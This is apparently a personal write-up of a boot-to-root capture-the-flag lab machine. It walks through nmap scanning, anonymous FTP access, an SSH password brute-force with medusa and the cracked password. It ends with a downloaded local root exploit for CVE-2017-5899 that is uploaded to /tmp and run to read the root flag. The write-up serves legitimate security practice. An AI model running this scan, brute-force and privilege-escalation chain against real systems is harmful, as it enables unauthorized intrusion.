Target Machine IP Address: 192.168.56.110 My Machine IP Address: 192.168.56.1
Boot to Root
1. To get user flag
2. To get root flag
3. To get root access
linpeas.sh did wonder as always
You can download the machine from here.
Information Gathering & Scanning Process:
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target IP: 192.168.56.110
nmap -sC -sV -p- -Pn 192.168.56.110 -o nmap.log
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-r-xr-xr-x 1 1000 1000 297 Feb 07 17:33 chadinfo 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) | http-robots.txt: 1 disallowed entry |_/kingchad.html
file chadinfo (it is an archived or zipped file) unzip chadinfo strings chadinfo
I found there is a username=chad and a file at /drippinchad.png
Then I tried to brute-force the ssh (because we know that the system is running ssh service from the nmap result) using hydra and medusa (it is becoming my favorite brute-force tool)
However, I tried every method I am aware of but couldn’t figure out. So I had to sneak other people’s walkthrough and I came to know that the hint was related with /drippinchad.png . I too upload the image in google image search engine and I came to know that the tower is called Maiden’s Tower. So, I made a list of these passwords (save it as password.txt).
medusa -h 192.168.56.110 -u chad -P password.txt -M ssh
P.S. I have added the above words in the rockyou.txt
ssh email@example.com password: maidenstower
Let’s use my favourite tool linpeas.sh
cp /usr/share/exploitdb/exploits/multiple/local/47172.sh .
However, this one worked for me. https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh (I downloaded this on my Kali Machine and then uploaded to /tmp of victim machine)
chmod +x exploit.sh ./exploit (I had to run it couple of times to get the root) cat /root/root.txt
I found robots.txt and couple more information like hash files in source code etc. But it was just a rabit hole to me so I didn’t write it here provided you were wondering the writer was on luck 😉
Note: This machine took me quite sometime to research and had to peek other write-up as well, specially google image scanning is my first time to try that. However, over all, I had a nice good time taking down this machine.